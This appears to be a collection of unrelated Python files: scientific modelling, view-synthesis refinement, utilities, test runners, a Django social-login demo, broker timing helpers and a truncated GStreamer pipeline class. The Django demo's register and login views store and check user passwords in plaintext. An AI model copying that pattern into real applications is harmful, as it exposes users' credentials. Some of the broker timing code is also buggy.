state_args : a dict of arguments to be passed to the property
package(s) for the control_volume of the model to
provide an initial state for initialization
(see documentation of the specific property package)
(default = None).
outlvl : sets output level of initialisation routine
optarg : solver options dictionary object (default=None, use
default solver options)
solver : str indicating which solver to use during
initialization (default = None, use default solver)
Returns:
None
"""
init_log = idaeslog.getInitLogger(blk.name, outlvl, tag="unit")
solve_log = idaeslog.getSolveLogger(blk.name, outlvl, tag="unit")
# Create solver
opt = get_solver(solver, optarg)
flags = blk.control_volume.initialize(
outlvl=outlvl + 1, optarg=optarg, solver=solver, state_args=state_args
)
init_log.info_high("Initialization Step 1 Complete.")
# Fix outlet enthalpy and pressure
for t in blk.flowsheet().time:
blk.control_volume.properties_out[t].pressure.fix(
value(blk.control_volume.properties_in[t].pressure)
)
blk.pressure_change_total_eqn.deactivate()
with idaeslog.solver_log(solve_log, idaeslog.DEBUG) as slc:
res = opt.solve(blk, tee=slc.tee)
init_log.info_high("Initialization Step 2 {}.".format(idaeslog.condition(res)))
# Unfix outlet enthalpy and pressure
for t in blk.flowsheet().time:
blk.control_volume.properties_out[t].pressure.unfix()
blk.pressure_change_total_eqn.activate()
with idaeslog.solver_log(solve_log, idaeslog.DEBUG) as slc:
res = opt.solve(blk, tee=slc.tee)
init_log.info_high("Initialization Step 3 {}.".format(idaeslog.condition(res)))
blk.control_volume.release_state(flags, outlvl)
init_log.info("Initialization Complete.")
def calculate_scaling_factors(self):
pass
|
#031 programa que leia a distancia de uma viagem e calcule o custo
# 0.50 por km até 200 km; mais de 200km , 0.45 por km
distancia = int(input("Qual a distância percorrida em Km para realizar sua viagem? "))
if distancia < 200:
custo = distancia * 0.50
print(f"A sua viagem será de {distancia}km. "
f"O custo da viagem é de R${custo:.2f}.")
else:
custo = distancia * 0.45
print(f"A sua viagem será de {distancia}km. "
f"O custo da viagem será de R${custo:.2f}. ")
|
from .arch_strand import ArchStrand
|
# -*- coding: utf-8 -*-
from app.constants import S_OK, S_ERR
import random
import math
import base64
import time
import ujson as json
from app import cfg
from app import util
def parse_json_kaohsiung_dig_point(data):
'''
add 1 town name 2. location. 3. range. 4. work_institute. 5. work_institute2
'''
data['town_name'] = data.get('extension', {}).get('district', '')
data['location'] = data.get('extension', {}).get('work_location', '')
data['range'] = ''
data['work_institute'] = data.get('extension', {}).get('apply_unit', '')
data['work_institute2'] = ''
data['geo'] = []
if 'extension' in data:
del data['extension']
|
r"""
`contk.metrics` provides functions evaluating results of models. It provides
a fair metric for every model.
"""
from .metric import MetricBase, PerlplexityMetric, BleuCorpusMetric, \
SingleDialogRecorder, LanguageGenerationRecorder, MetricChain
__all__ = ["MetricBase", "PerlplexityMetric", "BleuCorpusMetric", \
"SingleDialogRecorder", "LanguageGenerationRecorder", "MetricChain"]
|
class BaseOptError(Exception):
pass
class DefaultValueError(BaseOptError):
pass
class ChoicesValueError(BaseOptError):
pass
class ValueTypeError(BaseOptError):
pass
class BaseOpt(object):
def __init__(self, default, type, help=None, required=False,
secret=False, choices=None, app_config=None):
self.default = default
self.help = help
self.required = required
self.secret = secret
self.choices = choices
self.type = type
self.app_config = app_config
self._check()
def _check(self):
if self.choices is not None:
if not isinstance(self.choices, list):
raise ChoicesValueError()
for choice in self.choices:
if not isinstance(choice, self.type):
raise ChoicesValueError()
if self.default is not None:
if not isinstance(self.default, self.type):
raise DefaultValueError()
if self.choices and self.default not in self.choices:
raise DefaultValueError()
def get_deafult(self):
return self.fromat(self.default)
def fromat(self, value):
try:
return self._fromat(value)
except:
raise ValueTypeError()
def _fromat(self, value):
return self.type(value)
class StrOpt(BaseOpt):
def __init__(self, default, help=None, required=False,
secret=False, choices=None, app_config=None):
super(StrOpt, self).__init__(default, str, help, required,
secret, choices, app_config)
class IntOpt(BaseOpt):
def __init__(self, default, help=None, required=False,
secret=False, choices=None, app_config=None):
super(IntOpt, self).__init__(default, int, help, required,
secret, choices, app_config)
class BooleanOpt(BaseOpt):
def __init__(self, default, help=None, required=False,
secret=False, choices=None, app_config=None):
super(BooleanOpt, self).__init__(default, bool, help, required,
secret, choices, app_config)
def _fromat(self, value):
if value in ['True', 'true']:
return True
elif value in ['False', 'false']:
return False
class ListOpt(BaseOpt):
def __init__(self, default, help=None, required=False,
secret=False, choices=None, app_config=None):
super(ListOpt, self).__init__(default, list, help, required,
secret, choices, app_config)
def _fromat(self, value):
return value.split(',')
class FloatOpt(BaseOpt):
def __init__(self, default, help=None, required=False,
secret=False, choices=None, app_config=None):
super(FloatOpt, self).__init__(default, float, help, required,
secret, choices, app_config)
|
"""
Copyright (C) 2019 NVIDIA Corporation. All rights reserved.
Licensed under the NVIDIA Source Code License. See LICENSE.md at https://github.com/NVlabs/extreme-view-synth.
Authors: Inchang Choi, Orazio Gallo, Alejandro Troccoli, Min H. Kim, and Jan Kautz
"""
import numpy as np
import torch
from torch.autograd import Variable
import os
import time
import imageio
from vsynthlib.refinet.models import Model_VNPCAT
from vsynthlib import depth_util
class DeepViewRefiner(object):
NUM_INPUT_CHANNELS = 27
def __init__(self, filename_model_weight, working_dir, out_dir,
patch_size=64,
with_CUDA=True):
# define the model
self.model = Model_VNPCAT()
# load weight
self.with_CUDA = with_CUDA
self.model.load_state_dict(torch.load(filename_model_weight))
if with_CUDA:
self.model.cuda()
self.working_dir = working_dir
self.out_dir = out_dir
self.patch_size = patch_size
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
pass
def do(self, synth_obj, list_src_img, list_src_cam, count=0,
do_stereo=False, return_val=False, custom_outdir=''):
value = self.do_VNPCAT(synth_obj, list_src_img, list_src_cam,
count=count, return_val=return_val,
without_candi= False,
custom_outdir=custom_outdir)
if return_val:
return value
def do_VNPCAT(self, synth_obj, list_src_img, list_src_cam, count=0,
return_val=False, without_candi=False, custom_outdir=''):
func_fetch_patch = depth_util.fetch_patches_VNP
# load synth data
img_synth = synth_obj['img_synth']
depth_map_P1 = synth_obj['depth_map_P1']
depth_map_P2 = synth_obj['depth_map_P2']
dest_cam = synth_obj['dest_cam']
height, width, _ = img_synth.shape
# perform refinement patch-by-patchy
#############################################################
# Do Testing
#############################################################
img_merged = np.zeros(shape=(height, width, 3))
img_counter = np.zeros(shape=(height, width, 3))
for j in range(0, height, int(self.patch_size / 4)):
for i in range(0, width, int(self.patch_size / 4)):
t_start = time.time()
# set the model to the evaluation mode
self.model.eval()
# get candidate tensor
x_top = i
y_top = j
if x_top + self.patch_size >= width:
x_top = width - self.patch_size
if y_top + self.patch_size >= height:
y_top = height - self.patch_size
t_input_synth, list_t_candi_patch = func_fetch_patch(y_top, x_top, self.patch_size, dest_cam,
img_synth, list_src_img, list_src_cam,
depth_map_P1, depth_map_P2)
if t_input_synth is None:
print('None!')
continue
# check if more than half of input pixels are valid
t_in_slice = t_input_synth[0]
bool_nz = t_in_slice != -0.5
bool_nz = bool_nz.astype(np.float)
sum_nz = np.sum(bool_nz)
if sum_nz < self.patch_size * self.patch_size * 0.6:
continue
t_input_synth = np.expand_dims(t_input_synth, axis=0)
t_input_synth = t_input_synth.astype(np.float32)
_, chs, _, _ = t_input_synth.shape
n_patches = len(list_t_candi_patch)
t_in_synth = t_input_synth
input_synth_tensor \
= torch.from_numpy(t_in_synth)
if self.with_CUDA:
input_synth_tensor = input_synth_tensor.cuda()
with torch.no_grad():
input_synth_variable = Variable(input_synth_tensor, requires_grad=False)
list_input_candi_variable = []
for i in range(n_patches):
candi_patch = list_t_candi_patch[i]
candi_patch = np.expand_dims(candi_patch, axis=0)
candi_patch = candi_patch.astype(np.float32)
candi_tensor = torch.from_numpy(candi_patch)
if self.with_CUDA:
candi_tensor = candi_tensor.cuda()
with torch.no_grad():
input_candi_variable = Variable(candi_tensor)
list_input_candi_variable.append(input_candi_variable)
# do forward pass
if without_candi:
output_variable = self.model(input_synth_variable)
output_to_show = output_variable[0].cpu().data[0]
else:
output_variable = self.model(input_synth_variable, list_input_candi_variable)
output_to_show = output_variable.cpu().data[0]
output_to_show = output_to_show + 0.5
output_to_show = output_to_show.permute(1, 2, 0).numpy()
output_to_show[output_to_show < 0.0] = 0.0
output_to_show[output_to_show > 1.0] = 1.0
output_to_show = output_to_show * 255.0
output_to_show = output_to_show.astype(np.uint8)
img_merged[y_top:(y_top + self.patch_size), x_top:(x_top + self.patch_size), :] += output_to_show
img_counter[y_top:(y_top + self.patch_size), x_top:(x_top + self.patch_size), :] += 1
t_current = time.time()
t_elapsed_row = t_current - t_start
# delete variables
del input_synth_variable
for var in list_input_candi_variable:
self.var = var
del self.var
img_merged = img_merged / (img_counter + 1e-10)
img_merged /= 255.0
if return_val:
return img_merged[0:height, 0:width]
else:
filename_out_prefix = 'refined_vsynth_%04d' % (count)
if custom_outdir != '':
imageio.imwrite('%s/%s.png' % (custom_outdir, filename_out_prefix), img_merged[0:height, 0:width])
else:
imageio.imwrite('%s/%s.png' % (self.out_dir, filename_out_prefix), img_merged[0:height, 0:width])
|
import factory
from booking.models import MaterialImage
from booking.tests.factories import MaterialFactory
class MaterialImageFactory(factory.django.DjangoModelFactory):
class Meta:
model = MaterialImage
material = factory.SubFactory(MaterialFactory)
image = factory.django.ImageField()
|
import psutil
import platform
from datetime import datetime
def get_size(bytes, suffix="B"):
"""
Scale bytes to its proper format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
def get_diskfree():
partitions = psutil.disk_partitions()
df = ""
for partition in partitions:
try:
partition_usage = psutil.disk_usage(partition.mountpoint)
except PermissionError:
continue
if partition.mountpoint == "/":
df = "disk Free| " + str(get_size(partition_usage.free)) + " | " + str(partition_usage.percent) + " o|o used"
return df
|
# -*- coding: utf-8 -*-
import unittest
import six
from launchd import cmd
class LaunchdCmdTest(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
def tearDown(self):
unittest.TestCase.tearDown(self)
def testlaunchctl_invalid_args(self):
self.assertRaises(ValueError, cmd.launchctl, ["foo"])
def testlaunchctl_list(self):
stdout = cmd.launchctl("list").decode("utf-8")
self.assertTrue(isinstance(stdout, six.string_types))
def testlaunchctl_list_x(self):
label = "com.apple.Finder"
stdout = cmd.launchctl("list", label).decode("utf-8")
self.assertTrue(isinstance(stdout, six.string_types))
|
import numpy as np
import os
from keras.datasets import mnist
from keras.utils import np_utils
print('Start downloading dataset...')
# load MNIST from server
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# training data : 60000 samples
# reshape and normalize input data
x_train = x_train.reshape(x_train.shape[0], 1, 28*28)
x_train = x_train.astype('float32')
x_train /= 255
# encode output which is a number in range [0,9] into a vector of size 10
# e.g. number 3 will become [0, 0, 0, 1, 0, 0, 0, 0, 0, 0]
y_train = np_utils.to_categorical(y_train)
# same for test data : 10000 samples
x_test = x_test.reshape(x_test.shape[0], 1, 28*28)
x_test = x_test.astype('float32')
x_test /= 255
y_test = np_utils.to_categorical(y_test)
if not os.path.exists('data/'):
os.makedirs('data/')
np.savetxt('data/mnist_images_train.csv', x_train.reshape(len(x_train),784).tolist())
np.savetxt('data/mnist_images_test.csv', x_test.reshape(len(x_test),784).tolist())
np.savetxt('data/mnist_labels_train.csv', y_train.tolist())
np.savetxt('data/mnist_labels_test.csv', y_test.tolist())
print('Dataset downloaded.')
print('Data is located here:', os.getcwd() + '\data')
|
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, ili development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE.md, distributed with this software.
# ----------------------------------------------------------------------------
"""Run all tests.
Originally based on the all_tests.py script from the QIIME project
(http://github.com/qiime/qiime) project at svn revision 3290, now taken from
the E-vident (http://github.com/qiime/evident) project master branch at git SHA
dde2a06f2d990db8b09da65764cd27fc047db788
"""
import re
from os import walk, getcwd, chdir
from sys import exit
from glob import glob
from os.path import join, abspath, dirname, split, exists
from ili.util import get_ili_project_dir
from ili import __version__
from qcli.util import qcli_system_call
from qcli.test import run_script_usage_tests
from qcli.option_parsing import parse_command_line_parameters, make_option
script_info = {}
script_info['brief_description'] = ""
script_info['script_description'] = ""
script_info['script_usage'] = [("", "", "")]
script_info['output_description'] = ""
script_info['required_options'] = []
script_info['optional_options'] = [
make_option('--suppress_unit_tests', action='store_true', help='suppress '
" execution of ili's unit tests [default: %default]",
default=False),
make_option('--suppress_script_usage_tests', action='store_true',
help="suppress ili's script usage tests [default: "
"%default]", default=False),
make_option('--suppress_javascript_unit_tests', action='store_true',
help='suppress ili\'s JavaScript unit tests [default: '
'%default]', default=False),
make_option('--unittest_glob', help='wildcard pattern to match the unit '
'tests to execute [default: %default]', default=None),
make_option('--script_usage_tests', help='comma-separated list of the '
'script usage tests to execute [default: run all]',
default=None),
make_option('-p', '--temp_filepath', type='existing_path', help='temporary'
' directory where the script usage tests will be executed',
default='/tmp/'),
make_option('--ili_scripts_dir', help='filepath where the scripts are'
' stored', type='existing_path', default=None)
]
script_info['version'] = __version__
script_info['help_on_no_arguments'] = False
def main():
option_parser, opts, args = parse_command_line_parameters(**script_info)
unittest_glob = opts.unittest_glob
temp_filepath = opts.temp_filepath
script_usage_tests = opts.script_usage_tests
suppress_unit_tests = opts.suppress_unit_tests
suppress_script_usage_tests = opts.suppress_script_usage_tests
suppress_javascript_unit_tests = opts.suppress_javascript_unit_tests
# since the test data is in the tests folder just add scripts_test_data
ili_test_data_dir = join(abspath(dirname(__file__)),
'scripts_test_data/')
# offer the option for the user to pass the scripts dir from the command
# line since there is no other way to get the scripts dir. If not provided
# the base structure of the repository will be assumed. Note that for both
# cases we are using absolute paths, to avoid unwanted failures.
if opts.ili_scripts_dir is None:
ili_scripts_dir = abspath(join(get_ili_project_dir(), 'scripts/'))
else:
ili_scripts_dir = abspath(opts.ili_scripts_dir)
# make a sanity check
if (suppress_unit_tests and suppress_script_usage_tests and
suppress_javascript_unit_tests):
option_parser.error("All tests have been suppresed. Nothing to run.")
test_dir = abspath(dirname(__file__))
unittest_good_pattern = re.compile('OK\s*$')
application_not_found_pattern = re.compile('ApplicationNotFoundError')
python_name = 'python'
bad_tests = []
missing_application_tests = []
# Run through all of ili's unit tests, and keep track of any files
# which fail unit tests, note that these are the unit tests only
if not suppress_unit_tests:
unittest_names = []
if not unittest_glob:
for root, dirs, files in walk(test_dir):
for name in files:
if name.startswith('test_') and name.endswith('.py'):
unittest_names.append(join(root, name))
else:
for fp in glob(unittest_glob):
fn = split(fp)[1]
if fn.startswith('test_') and fn.endswith('.py'):
unittest_names.append(abspath(fp))
unittest_names.sort()
for unittest_name in unittest_names:
print "Testing %s:\n" % unittest_name
command = '%s %s -v' % (python_name, unittest_name)
stdout, stderr, return_value = qcli_system_call(command)
print stderr
if not unittest_good_pattern.search(stderr):
if application_not_found_pattern.search(stderr):
missing_application_tests.append(unittest_name)
else:
bad_tests.append(unittest_name)
script_usage_failures = 0
# choose to run some of the script usage tests or all the available ones
if (not suppress_script_usage_tests and exists(ili_test_data_dir) and
exists(ili_scripts_dir)):
if script_usage_tests is not None:
script_tests = script_usage_tests.split(',')
else:
script_tests = None
initial_working_directory = getcwd()
# Run the script usage testing functionality; note that depending on
# the module where this was imported, the name of the arguments will
# change that's the reason why I added the name of the arguments in
# here
script_usage_result_summary, script_usage_failures = \
run_script_usage_tests(ili_test_data_dir, # test_data_dir
ili_scripts_dir, # scripts_dir
temp_filepath, # working_dir
True, # verbose
script_tests, # tests
None, # failure_log_fp
False) # force_overwrite
# running script usage tests breaks the current working directory
chdir(initial_working_directory)
if not suppress_javascript_unit_tests:
runner = join(test_dir, 'javascript_tests', 'runner.js')
index = join(test_dir, 'javascript_tests', 'index.html')
o, e, r = qcli_system_call('phantomjs %s %s' % (runner, index))
if o:
print o
if e:
print e
# if all the tests passed
javascript_tests_passed = True if r == 0 else False
else:
javascript_tests_passed = True
print "==============\nResult summary\n=============="
if not suppress_unit_tests:
print "\nUnit test result summary\n------------------------\n"
if bad_tests:
print ("\nFailed the following unit tests.\n%s"
% '\n'.join(bad_tests))
if missing_application_tests:
print ("\nFailed the following unit tests, in part or whole due "
"to missing external applications.\nDepending on the "
"ili features you plan to use, this may not be "
"critical.\n%s" % '\n'.join(missing_application_tests))
if not(missing_application_tests or bad_tests):
print "\nAll unit tests passed.\n"
if not suppress_script_usage_tests:
if exists(ili_test_data_dir) and exists(ili_scripts_dir):
print ("\nScript usage test result summary"
"\n--------------------------------\n")
print script_usage_result_summary
else:
print ("\nCould not run script usage tests.\nThe ili scripts "
"directory could not be automatically located, try "
"supplying it manually using the --ili_scripts_dir "
"option.")
if not suppress_javascript_unit_tests:
print ('\nJavaScript unit tests result summary\n'
'------------------------------------\n')
if javascript_tests_passed:
print 'All JavaScript unit tests passed.\n'
else:
print 'JavaScript unit tests failed, check the summary above.'
# In case there were no failures of any type, exit with a return code of 0
return_code = 1
if (len(bad_tests) == 0 and len(missing_application_tests) == 0 and
script_usage_failures == 0 and javascript_tests_passed):
return_code = 0
return return_code
if __name__ == "__main__":
exit(main())
|
# -*- coding: utf-8 -*-
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.core.urlresolvers import reverse
# in this example, import SiteUser just for get all users,
# to display at the home page.
# In a real project, It's not necessary import SiteUser usually
from social_login.models import SiteUser
# as same as SiteUser, import the following two just for this example
# to get the siet_name_zh
from socialoauth import socialsites
from socialoauth.utils import import_oauth_class
from .models import UserAuth, UserInfo
class RegisterLoginError(Exception):
pass
def home(request):
if request.siteuser:
if not UserInfo.objects.filter(user_id=request.siteuser.id).exists():
return HttpResponseRedirect(reverse('register_step_2'))
all_users = SiteUser.objects.select_related('user_info', 'social_user').all()
def _make_user_info(u):
info = {}
info['id'] = u.id
info['social'] = u.is_social
if info['social']:
site_id = u.social_user.site_id
s = import_oauth_class( socialsites.get_site_class_by_id(site_id) )()
info['social'] = s.site_name_zh
info['username'] = u.user_info.username
info['avatar'] = u.user_info.avatar
info['current'] = request.siteuser and request.siteuser.id == u.id
return info
users = map(_make_user_info, all_users)
return render_to_response(
'home.html',
{
'users': users,
},
context_instance=RequestContext(request)
)
def register(request):
if request.method == 'GET':
return render_to_response(
'register.html', context_instance=RequestContext(request)
)
def _register():
email = request.POST.get('email', None)
password = request.POST.get('password', None)
if not email or not password:
raise RegisterLoginError("Fill email and password")
if UserAuth.objects.filter(email=email).exists():
raise RegisterLoginError("Email has been taken")
user = UserAuth.objects.create(email=email, password=password)
return user
try:
user = _register()
request.session['uid'] = user.user_id
return HttpResponseRedirect(reverse('register_step_2'))
except RegisterLoginError as e:
return render_to_response(
'register.html',
{'error_msg': e},
context_instance=RequestContext(request)
)
def register_step_2(request):
if not request.siteuser:
return HttpResponseRedirect(reverse('home'))
if request.method == 'GET':
return render_to_response(
'register_step_2.html',
{'email': UserAuth.objects.get(user_id=request.siteuser.id).email},
context_instance=RequestContext(request)
)
def _register_step_2():
username = request.POST.get('username', None)
if not username:
raise RegisterLoginError("Fill in username")
UserInfo.objects.create(user_id=request.siteuser.id, username=username)
try:
_register_step_2()
return HttpResponseRedirect(reverse('home'))
except RegisterLoginError as e:
return render_to_response(
'register_step_2.html',
{
'email': UserAuth.objects.get(user_id=request.siteuser.id).email,
'error_msg': e
},
context_instance=RequestContext(request)
)
def login(request):
if request.siteuser:
# already logged in
return HttpResponseRedirect(reverse('home'))
if request.method == 'GET':
return render_to_response(
'login.html',
context_instance=RequestContext(request)
)
def _login():
email = request.POST.get('email', None)
password = request.POST.get('password', None)
if not email or not password:
raise RegisterLoginError("Fill email and password")
if not UserAuth.objects.filter(email=email, password=password).exists():
raise RegisterLoginError("Invalid account")
user = UserAuth.objects.get(email=email, password=password)
return user
try:
user = _login()
request.session['uid'] = user.user_id
return HttpResponseRedirect(reverse('home'))
except RegisterLoginError as e:
return render_to_response(
'login.html',
{'error_msg': e},
context_instance=RequestContext(request)
)
def logout(request):
try:
del request.session['uid']
except:
pass
finally:
return HttpResponseRedirect(reverse('home'))
def login_error(request):
return HttpResponse("OAuth Failure!")
|
import os.path
from pathlib import Path
from os import fspath
import os.path
import json
import numpy as np
import pandas as pd
def Write_Brokers_Opening_Times(Chart):
data_path = Path(Path(
__file__).resolve().parent.parent.parent) / "DATA\BROKERS_OPEN_TIMES.csv"
data_path_last = fspath(data_path)
column_names = ["Broker","Symbol", "Period", "OpenTime"]
df = pd.DataFrame(columns=column_names)
df = df.append({"Broker": Chart.Broker,"Symbol": Chart.Symbol, "Period": Chart.Period, "OpenTime": Chart.OpenTimes[-1]}, ignore_index=True)
if os.path.isfile(data_path_last):
df_from_file = pd.read_csv(data_path_last)
frames = [df_from_file, df]
result = pd.concat(frames)
result.to_csv(data_path_last, index=False, header=True)
else:
df.to_csv(data_path_last, index=False, header=True)
def Write_Brokers_Closing_Times(Chart):
data_path = Path(Path(
__file__).resolve().parent.parent.parent) / "DATA\BROKERS_CLOSE_TIMES.csv"
data_path_last = fspath(data_path)
column_names = ["Broker","Symbol", "Period", "CloseTime"]
df = pd.DataFrame(columns=column_names)
df = df.append({"Broker": Chart.Broker,"Symbol": Chart.Symbol, "Period": Chart.Period, "CloseTime": Chart.ClosingTimes[-1]}, ignore_index=True)
if os.path.isfile(data_path_last):
df_from_file = pd.read_csv(data_path_last)
frames = [df_from_file, df]
result = pd.concat(frames)
result.to_csv(data_path_last, index=False, header=True)
else:
df.to_csv(data_path_last, index=False, header=True)
def Open_Time_To_Existing_Chart(data, Chart):
sub_msg = data.decode('utf8').replace("}{", ", ")
my_json = json.loads(sub_msg)
json.dumps(sub_msg, indent=4, sort_keys=True)
my_json["time_start"] = np.datetime64(my_json["time_start"])
my_json["time_stop"] = np.datetime64(my_json["time_stop"])
diff = my_json["time_stop"] - my_json["time_start"]
diff = diff / np.timedelta64(1, 'ms')
Chart.OpenTimes.append(diff)
Write_Brokers_Opening_Times(Chart)
def Open_Time_To_New_Chart(Chart, path_file):
data_path_last = path_file
if os.path.isfile(data_path_last):
df_from_file = pd.read_csv(data_path_last)
lo=df_from_file.loc[df_from_file['Broker'] == Chart.Broker, 'OpenTime']
if not lo.empty :
li = lo.tolist()
return li
else: return [200]
else:
return [200]
def Close_Time_To_Existing_Chart(data, Chart):
sub_msg = data.decode('utf8').replace("}{", ", ")
my_json = json.loads(sub_msg)
json.dumps(sub_msg, indent=4, sort_keys=True)
my_json["time_start"] = np.datetime64(my_json["time_start"])
my_json["time_stop"] = np.datetime64(my_json["time_stop"])
diff = my_json["time_stop"] - my_json["time_start"]
diff = diff / np.timedelta64(1, 'ms')
Chart.CloseTimes.append(diff)
Write_Brokers_Opening_Times(Chart)
def Close_Time_To_New_Chart(Chart, path_file):
data_path_last = path_file
if os.path.isfile(data_path_last):
df_from_file = pd.read_csv(data_path_last)
lo=df_from_file.loc[df_from_file['Broker'] == Chart.Broker, 'CloseTime']
if not lo.empty :
li = lo.tolist()
return li
else: return [200]
else:
return [200]
def Average_OpenTimes(Chart):
if Chart.OpenTimes:
return (sum(Chart.OpenTimes) / len(Chart.OpenTimes)+max(Chart.OpenTimes))/2
else: return None
def Average_CloseTimes(Chart):
if Chart.ClosingTimes:
return (sum(Chart.ClosingTimes) / len(Chart.ClosingTimes) + max(Chart.ClosingTimes)) / 2
else:
return None
|
'''
* Copyright (C) 2019-2020 Intel Corporation.
*
* SPDX-License-Identifier: BSD-3-Clause
'''
import copy
import json
import os
import string
import time
from threading import Lock, Thread
from collections import namedtuple
import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstApp', '1.0')
# pylint: disable=wrong-import-position
from gi.repository import GLib, Gst, GstApp # pylint: disable=unused-import
from gstgva.util import GVAJSONMeta
from vaserving.app_destination import AppDestination
from vaserving.app_source import AppSource
from vaserving.common.utils import logging
from vaserving.pipeline import Pipeline
from vaserving.rtsp.gstreamer_rtsp_destination import GStreamerRtspDestination # pylint: disable=unused-import
from vaserving.rtsp.gstreamer_rtsp_server import GStreamerRtspServer
# pylint: enable=wrong-import-position
class GStreamerPipeline(Pipeline):
Gst.init(None)
GVA_INFERENCE_ELEMENT_TYPES = ["GstGvaDetect",
"GstGvaClassify",
"GstGvaInference",
"GvaAudioDetect"]
_inference_element_cache = {}
_mainloop = None
_mainloop_thread = None
_rtsp_server = None
CachedElement = namedtuple("CachedElement", ["element", "pipelines"])
@staticmethod
def gobject_mainloop():
GStreamerPipeline._mainloop = GLib.MainLoop.new(None, False)
try:
GStreamerPipeline._mainloop.run()
except (KeyboardInterrupt, SystemExit):
pass
def __init__(self, identifier, config, model_manager, request, finished_callback, options):
# TODO: refactor as abstract interface
# pylint: disable=super-init-not-called
self.config = config
self.identifier = identifier
self.pipeline = None
self.template = config['template']
self.models = model_manager.models
self.model_manager = model_manager
self.request = request
self.state = Pipeline.State.QUEUED
self.frame_count = 0
self.start_time = None
self.stop_time = None
self.avg_fps = 0
self._gst_launch_string = None
self.latency_times = dict()
self.sum_pipeline_latency = 0
self.count_pipeline_latency = 0
self._real_base = None
self._stream_base = None
self._year_base = None
self._month_base = None
self._day_base = None
self._dir_name = None
self._bus_connection_id = None
self._create_delete_lock = Lock()
self._finished_callback = finished_callback
self._bus_messages = False
self.appsrc_element = None
self._app_source = None
self.appsink_element = None
self._app_destinations = []
self._cached_element_keys = []
self._logger = logging.get_logger('GSTPipeline', is_static=True)
self.rtsp_path = None
if (not GStreamerPipeline._mainloop):
GStreamerPipeline._mainloop_thread = Thread(
target=GStreamerPipeline.gobject_mainloop)
GStreamerPipeline._mainloop_thread.daemon = True
GStreamerPipeline._mainloop_thread.start()
if (options.enable_rtsp and not GStreamerPipeline._rtsp_server):
GStreamerPipeline._rtsp_server = GStreamerRtspServer(options.rtsp_port)
GStreamerPipeline._rtsp_server.start()
self.rtsp_server = GStreamerPipeline._rtsp_server
self._verify_and_set_rtsp_destination()
@staticmethod
def mainloop_quit():
if (GStreamerPipeline._rtsp_server):
GStreamerPipeline._rtsp_server.stop()
# Explicit delete frees GstreamerRtspServer resources.
# Avoids hang or segmentation fault on vaserving.stop()
del GStreamerPipeline._rtsp_server
GStreamerPipeline._rtsp_server = None
if (GStreamerPipeline._mainloop):
GStreamerPipeline._mainloop.quit()
GStreamerPipeline._mainloop = None
if (GStreamerPipeline._mainloop_thread):
GStreamerPipeline._mainloop_thread = None
def _verify_and_set_rtsp_destination(self):
destination = self.request.get("destination", {})
frame_destination = destination.get("frame", {})
frame_destination_type = frame_destination.get("type", None)
if frame_destination_type == "rtsp":
if not self.rtsp_server:
raise Exception("Unsupported Frame Destination: RTSP Server isn't enabled")
self.rtsp_path = frame_destination["path"]
if not self.rtsp_path.startswith('/'):
self.rtsp_path = "/" + self.rtsp_path
self.rtsp_server.check_if_path_exists(self.rtsp_path)
frame_destination["class"] = "GStreamerRtspDestination"
rtsp_destination = AppDestination.create_app_destination(self.request, self, "frame")
if not rtsp_destination:
raise Exception("Unsupported Frame Destination: {}".format(
frame_destination["class"]))
self._app_destinations.append(rtsp_destination)
def _delete_pipeline(self, new_state):
self.state = new_state
self.stop_time = time.time()
self._logger.debug("Setting Pipeline {id}"
" State to {next_state}".format(id=self.identifier,
next_state=new_state.name))
if self.pipeline:
bus = self.pipeline.get_bus()
if self._bus_connection_id:
bus.remove_signal_watch()
bus.disconnect(self._bus_connection_id)
self._bus_connection_id = None
self.pipeline.set_state(Gst.State.NULL)
del self.pipeline
self.pipeline = None
if self._app_source:
self._app_source.finish()
for destination in self._app_destinations:
destination.finish()
self._app_destinations.clear()
if (new_state == Pipeline.State.ERROR):
for key in self._cached_element_keys:
for pipeline in GStreamerPipeline._inference_element_cache[key].pipelines:
if (self != pipeline):
pipeline.stop()
del GStreamerPipeline._inference_element_cache[key]
self._finished_callback()
def _delete_pipeline_with_lock(self, new_state):
with(self._create_delete_lock):
self._delete_pipeline(new_state)
def stop(self):
with(self._create_delete_lock):
if not self.state.stopped():
if (self.pipeline):
structure = Gst.Structure.new_empty(self.state.name)
message = Gst.Message.new_custom(
Gst.MessageType.APPLICATION, None, structure)
self.pipeline.get_bus().post(message)
else:
self.state = Pipeline.State.ABORTED
return self.status()
def params(self):
# TODO: refactor
# pylint: disable=R0801
request = copy.deepcopy(self.request)
if "models" in request:
del request["models"]
params_obj = {
"id": self.identifier,
"request": request,
"type": self.config["type"],
"launch_command": self._gst_launch_string
}
return params_obj
def status(self):
self._logger.debug("Called Status")
if self.start_time is not None:
if self.stop_time is not None:
elapsed_time = max(0, self.stop_time - self.start_time)
else:
elapsed_time = max(0, time.time() - self.start_time)
else:
elapsed_time = None
status_obj = {
"id": self.identifier,
"state": self.state,
"avg_fps": self.avg_fps,
"start_time": self.start_time,
"elapsed_time": elapsed_time
}
if self.count_pipeline_latency != 0:
status_obj["avg_pipeline_latency"] = self.sum_pipeline_latency / \
self.count_pipeline_latency
return status_obj
def get_avg_fps(self):
return self.avg_fps
def _get_element_property(self, element, key):
if isinstance(element, str):
return (element, key, None)
if isinstance(element, dict):
return (element["name"], element["property"], element.get("format", None))
return None
def _set_bus_messages_flag(self):
request_parameters, config_parameters = Pipeline.get_section_and_config(
self.request, self.config, ["parameters"],
["parameters", "properties"])
bus_msgs = "bus-messages"
if bus_msgs in config_parameters and bus_msgs in request_parameters and \
isinstance(request_parameters[bus_msgs], bool):
self._bus_messages = request_parameters[bus_msgs]
def _set_section_properties(self, request_section, config_section):
# TODO: refactor
# pylint: disable=R1702
request, config = Pipeline.get_section_and_config(
self.request, self.config, request_section, config_section)
for key in config:
if isinstance(config[key], dict) and "element" in config[key]:
if key in request:
if isinstance(config[key]["element"], list):
element_properties = [self._get_element_property(
x, key) for x in config[key]["element"]]
else:
element_properties = [self._get_element_property(
config[key]["element"], key)]
